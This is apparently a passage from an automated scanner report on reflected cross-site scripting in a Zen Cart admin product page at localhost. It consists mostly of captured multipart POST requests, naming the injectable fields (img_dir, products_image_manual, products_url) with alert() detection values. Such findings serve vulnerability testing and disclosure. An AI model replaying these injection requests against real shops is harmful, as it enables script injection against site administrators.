name="products_priced_by_attribute" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_price" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------19864573418301 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_description[2]" -----------------------------19864573418301 Content-Disposition: form-data; name="products_description[1]" test -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------19864573418301 Content-Disposition: form-data; name="products_model" testval -----------------------------19864573418301 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------19864573418301 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------19864573418301 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------19864573418301 Content-Disposition: form-data; name="image_delete" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="overwrite" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------19864573418301 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------19864573418301 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------19864573418301 Content-Disposition: form-data; name="products_weight" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------19864573418301-- HTTP Response ----Truncated due to large size --- pes
    admin admin $12.00
    3ds/25
    For more information, please visit this products webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    Englishalert(14405309.33507) Detection value: HTTP Request POST /zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product_preview HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------19864573418301 Content-Length: 4883 -----------------------------19864573418301 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------19864573418301 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------19864573418301 Content-Disposition: form-data; name="x" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="y" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="master_category" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------19864573418301 Content-Disposition: form-data; name="products_status" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------19864573418301 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------19864573418301 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------19864573418301 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_price" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------19864573418301 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------19864573418301 Content-Disposition: form-data; name="products_description[1]" -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------19864573418301 Content-Disposition: form-data; name="products_model" testval -----------------------------19864573418301 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------19864573418301 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------19864573418301 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------19864573418301 Content-Disposition: form-data; name="image_delete" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="overwrite" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------19864573418301 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------19864573418301 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------19864573418301 Content-Disposition: form-data; name="products_weight" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------19864573418301-- HTTP Response ----Truncated due to large size --- " class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.
    English admin $12.00
    3ds/25
    For more information, please visit this products webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    Finding 3.9: Cross-Site Scripting. This is a reflected XSS vulnerability, detected in an alert that was an immediate response to the injection. Injected item: POST: img_dir Injection value: >"> Detection value: alert(14405309.33877) HTTP Request POST /zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product_preview HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------19864573418301 Content-Length: 4886 -----------------------------19864573418301 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------19864573418301 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------19864573418301 Content-Disposition: form-data; name="x" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="y" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="master_category" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------19864573418301 Content-Disposition: form-data; name="products_status" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------19864573418301 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------19864573418301 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------19864573418301 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_price" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------19864573418301 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------19864573418301 Content-Disposition: form-data; name="products_description[1]" test -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------19864573418301 Content-Disposition: form-data; name="products_model" testval -----------------------------19864573418301 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------19864573418301 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------19864573418301 Content-Disposition: form-data; name="img_dir" >"> -----------------------------19864573418301 Content-Disposition: form-data; name="image_delete" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="overwrite" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------19864573418301 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------19864573418301 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------19864573418301 Content-Disposition: form-data; name="products_weight" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------19864573418301-- HTTP Response Manager
  • Media Types
  • admin admin $12.00
    25" border="0" alt=">">25" title=" >">25 " width="100" height="80" align="right" hspace="5" vspace="5">Default text
    For more information, please visit this products webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    "> Detection value: alert(14405309.33977) HTTP Request POST /zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product_preview HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------19864573418301 Content-Length: 4888 -----------------------------19864573418301 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------19864573418301 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------19864573418301 Content-Disposition: form-data; name="x" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="y" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="master_category" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------19864573418301 Content-Disposition: form-data; name="products_status" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------19864573418301 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------19864573418301 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------19864573418301 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_price" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------19864573418301 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------19864573418301 Content-Disposition: form-data; name="products_description[1]" test -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------19864573418301 Content-Disposition: form-data; name="products_model" testval -----------------------------19864573418301 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------19864573418301 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------19864573418301 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------19864573418301 Content-Disposition: form-data; name="image_delete" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="overwrite" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_image_manual" >"> -----------------------------19864573418301 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------19864573418301 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------19864573418301 Content-Disposition: form-data; name="products_weight" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------19864573418301-- HTTP Response ger
  • Media Types
  • admin admin $12.00
    " border="0" alt="3ds/>">" title=" 3ds/>"> " width="100" height="80" align="right" hspace="5" vspace="5">Default text
    For more information, please visit this products webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    "> Detection value: alert(14405309.34147) HTTP Request POST /zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product_preview HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------19864573418301 Content-Length: 4870 -----------------------------19864573418301 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------19864573418301 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------19864573418301 Content-Disposition: form-data; name="x" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="y" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="master_category" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------19864573418301 Content-Disposition: form-data; name="products_status" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------19864573418301 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------19864573418301 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------19864573418301 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_price" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------19864573418301 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------19864573418301 Content-Disposition: form-data; name="products_description[1]" test -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------19864573418301 Content-Disposition: form-data; name="products_model" testval -----------------------------19864573418301 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------19864573418301 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------19864573418301 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------19864573418301 Content-Disposition: form-data; name="image_delete" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="overwrite" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------19864573418301 Content-Disposition: form-data; name="products_url[2]" >"> -----------------------------19864573418301 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------19864573418301 Content-Disposition: form-data; name="products_weight" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------19864573418301-- HTTP Response ----Truncated due to large size --- h="100%" cellspacing="0" cellpadding="2">
    admin admin $12.00
    3ds/25Default text
    For more information, please visit this products " target="blank">webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    Finding 3.12: Cross-Site Scripting. This is a reflected XSS vulnerability, detected in an alert that was an immediate response to the injection. Injected item: POST: products_url[1] Injection value: >"> Detection value: alert(14405309.34207) HTTP Request POST /zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product_preview HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------19864573418301 Content-Length: 4870 -----------------------------19864573418301 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------19864573418301 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------19864573418301 Content-Disposition: form-data; name="x" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="y" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="master_category" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------19864573418301 Content-Disposition: form-data; name="products_status" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------19864573418301 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------19864573418301 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------19864573418301 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_price" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------19864573418301 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------19864573418301 Content-Disposition: form-data; name="products_description[1]" test -----------------------------19864573418301 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------19864573418301 Content-Disposition: form-data; name="products_model" testval -----------------------------19864573418301 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------19864573418301 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------19864573418301 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------19864573418301 Content-Disposition: form-data; name="image_delete" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="overwrite" 1 -----------------------------19864573418301 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------19864573418301 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------19864573418301 Content-Disposition: form-data; name="products_url[1]" >"> -----------------------------19864573418301 Content-Disposition: form-data; name="products_weight" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------19864573418301 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------19864573418301-- HTTP Response ----Truncated due to large size --- "100%" cellspacing="0" cellpadding="2">
    English admin $12.00
    English admin $12.00
    3ds/25test
    For more information, please visit this products " target="blank">webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    alert(14405309.38717) -----------------------------247302997218101 Content-Disposition: form-data; name="products_description[1]" -----------------------------247302997218101 Content-Disposition: form-data; name="products_url[1]" -----------------------------247302997218101 Content-Disposition: form-data; name="products_image" 3ds/25 -----------------------------247302997218101-- HTTP Response ----Truncated due to large size --- 2">Products Price Manager Meta Tags Undefined
    2 Preview  0   Product is Linked
    0 alert(14405309.41217) -----------------------------28667138731706 Content-Disposition: form-data; name="products_description[1]" test -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------28667138731706 Content-Disposition: form-data; name="products_model" testval -----------------------------28667138731706 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------28667138731706 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------28667138731706 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------28667138731706 Content-Disposition: form-data; name="image_delete" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="overwrite" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------28667138731706 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------28667138731706 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------28667138731706 Content-Disposition: form-data; name="products_weight" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------28667138731706 Content-Disposition: form-data; name="search" test -----------------------------28667138731706-- HTTP Response ----Truncated due to large size --- pes
    admin admin $12.00
    3ds/25
    For more information, please visit this products webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    Englishalert(14405309.41407) Detection value: HTTP Request POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product_preview&search=test HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product&search=test Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------28667138731706 Content-Length: 4983 -----------------------------28667138731706 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------28667138731706 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------28667138731706 Content-Disposition: form-data; name="x" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="y" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="master_category" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="master_categories_id" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_discount_type" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_discount_type_from" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_price_sorter" 12.0000 -----------------------------28667138731706 Content-Disposition: form-data; name="products_status" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_date_available" 08/25/2015 -----------------------------28667138731706 Content-Disposition: form-data; name="manufacturers_id" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_name[2]" admin -----------------------------28667138731706 Content-Disposition: form-data; name="products_name[1]" admin -----------------------------28667138731706 Content-Disposition: form-data; name="product_is_free" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="product_is_call" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_priced_by_attribute" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_tax_class_id" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_price" 12 -----------------------------28667138731706 Content-Disposition: form-data; name="products_price_gross" 12 -----------------------------28667138731706 Content-Disposition: form-data; name="products_virtual" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="product_is_always_free_shipping" 2 -----------------------------28667138731706 Content-Disposition: form-data; name="products_qty_box_status" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity_order_min" 12 -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity_order_max" 12 -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity_order_units" 12 -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity_mixed" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_description[2]" Default text -----------------------------28667138731706 Content-Disposition: form-data; name="products_description[1]" -----------------------------28667138731706 Content-Disposition: form-data; name="products_quantity" 1222111 -----------------------------28667138731706 Content-Disposition: form-data; name="products_model" testval -----------------------------28667138731706 Content-Disposition: form-data; name="products_image"; filename="" Content-Type: application/octet-stream -----------------------------28667138731706 Content-Disposition: form-data; name="products_previous_image" 3ds/25 -----------------------------28667138731706 Content-Disposition: form-data; name="img_dir" 3ds/ -----------------------------28667138731706 Content-Disposition: form-data; name="image_delete" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="overwrite" 1 -----------------------------28667138731706 Content-Disposition: form-data; name="products_image_manual" 25 -----------------------------28667138731706 Content-Disposition: form-data; name="products_url[2]" http://www.kelev.biz -----------------------------28667138731706 Content-Disposition: form-data; name="products_url[1]" http://www.kelev.biz -----------------------------28667138731706 Content-Disposition: form-data; name="products_weight" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_sort_order" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------28667138731706 Content-Disposition: form-data; name="search" test -----------------------------28667138731706-- HTTP Response ----Truncated due to large size --- " class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.
    English admin $12.00
    3ds/25
    For more information, please visit this products webpage.
    This product was added to our catalog on Tuesday 25 August, 2015.
    Finding 3.17: Cross-Site Scripting. This is a reflected XSS vulnerability, detected in an alert that was an immediate response to the injection. Injected item: POST: img_dir Injection value: >"> Detection value: alert(14405309.41787) HTTP Request POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product_preview&search=test HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: Connection: keep-alive Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product&search=test Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4 Content-Type: multipart/form-data; boundary=---------------------------28667138731706 Content-Length: 4986 -----------------------------28667138731706 Content-Disposition: form-data; name="securityToken" 9adbdf7813e8bda76f1aa498b0b5f4ea -----------------------------28667138731706 Content-Disposition: form-data; name="products_date_added" 2015-08-25 18:43:21 -----------------------------28667138731706 Content-Disposition: form-data; name="x" 0 -----------------------------28667138731706 Content-Disposition: form-data; name="y" 0 